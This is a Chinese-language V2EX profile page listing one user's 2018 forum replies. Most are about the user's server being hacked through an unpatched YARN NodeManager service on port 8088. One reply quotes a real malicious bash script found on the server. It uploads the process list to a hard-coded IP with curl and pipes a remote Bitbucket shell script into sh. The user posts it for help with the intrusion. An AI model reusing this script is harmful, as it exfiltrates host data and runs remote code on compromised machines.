V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  choice4  ›  全部回复第 9 页 / 共 15 页
回复总数  287
1  2  3  4  5  6  7  8  9  10 ... 15  
2018-10-15 09:48:46 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@aloof 8088 就是我要使用的端口 然后问题就是从这个端口上出的 。firewalld 和安全组我都是只开我自己用的。 但是那个 8088 上跑的程序有安全漏洞。被人黑了
2018-10-14 17:53:36 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@hdonghong 我这会就是直接把 8088 关了就没事了。你这个跟我这个是不是一样我不清楚啊。我这个是因为 8088 的一个服务有安全漏洞。然后脚本什么的应该就是通过 8088 植入的 我把 8088 关了就好了。具体你根据你自己的实际情况来。不行就把先把 crontab 弄掉。然后把你自定义的防火墙规则全关了得了 。再一步一步排查
2018-10-14 11:31:58 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@likuku
2018-10-14 11:31:47 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@Greenm 是 yarn 加个口令是什么操作命令行还是配置文件。我搜到一个关于这个的配置文件 不过 property 里面好像有些变量 在对号
2018-10-14 11:22:19 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@likuku 就是说 不管这些人是通过什么方式入侵 最后都是通过 ssh 吗 ssh 端口我倒是没改 只是禁了 root 和密码登录, 我搜索到的是说我 8088 跑的东西有一些安全机制的问题 ,后台的版本修复了 。但是我用的那个版本较低,还是有这个漏洞的。 老哥我已经好几个问题看见你帮我了 /笑哭 多谢多谢
2018-10-13 23:32:13 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@watzds 确实好像是一个服务有漏洞
2018-10-13 23:31:43 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@WordTian 8088 跑着一个 yarn 我刚才查到是 nodemanager 的漏洞 最开始好像是个俄罗斯黑客发现并利用的漏洞, 目前还在继续找解决办法
2018-10-13 23:01:16 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
以前没在意过这些 安全组都是直接地址段访问然后 0.0.0.0/0
这会有点难受了
2018-10-13 23:00:30 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
@WordTian 你好 请问有办法限制 ip 吗? 我搞了一会搞不好 直接关了 8088 我这边好多也不方便了
2018-10-13 22:59:28 +08:00
回复了 choice4 创建的主题 Linux 攻击别人服务器是怎么搞的啊
#!/bin/bash

ps ax --sort=-pcpu > /tmp/tmp2.txt
#netstat -antp > /tmp/tmp2.txt
#crontab -l > /tmp/tmp2.txt
#ps -eo uid,pid,ppid,stime,%cpu,cmd --sort=-%cpu |grep -v STIME| head>/tmp/tmp2.txt
#top -c -n 1 -b > /tmp/tmp.txt
curl -F "file=@/tmp/tmp2.txt" http://46.249.38.186/rep.php
rm -rf /tmp/tmp2.txt

LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi

if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
$LDR https://bitbucket.org/okjh6t37/mygit/raw/master/zz.sh | sh
else
pwd
fi


这可能是那个脚本
2018-10-01 19:23:45 +08:00
回复了 choice4 创建的主题 宽带症候群 ipv6 访问墙外?
。。哦哦 不好意思确实刚知道
===
终结
2018-09-30 19:03:05 +08:00
回复了 daishankeke 创建的主题 程序员 别人问起你的职业的时候,何如优雅的回答你是程序员?
正八经就是计算机呗 搞一点就是祭天的 滑稽.png
2018-09-28 11:22:14 +08:00
回复了 qiandongdong 创建的主题 Facebook Facebook 被停用了,怎么办
同样哎 楼主 这几天 facebook 疯狂要我传照片 我传一次好使一天。 然后基本只过一天也就是 第二天又得验证又得传照片 。 我都传两次了 。 今天又让我传。 心态崩了
2018-09-12 15:57:31 +08:00
回复了 choice4 创建的主题 Java 杀死 Java 程序
@wenzhoou 这个感觉不错
2018-09-10 20:05:32 +08:00
回复了 thinkmore 创建的主题 成都 七年长跑,终于结婚了。
@zhangZMZ 一股清流~
2018-09-10 10:11:02 +08:00
回复了 mydns 创建的主题 问与答 百度公司有自己的卫星吗?
@whileFalse 一楼是在调侃楼主吧==
2018-09-08 16:37:53 +08:00
回复了 dingzi 创建的主题 推广 「专属」idm 终身授权特价团购 回帖抽免费终身授权
分母是 12 的最简真分数有几个
1  2  3  4  5  6  7  8  9  10 ... 15  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5379 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 29ms · UTC 07:03 · PVG 15:03 · LAX 23:03 · JFK 02:03
Developed with CodeLauncher
♥ Do have faith in what you're doing.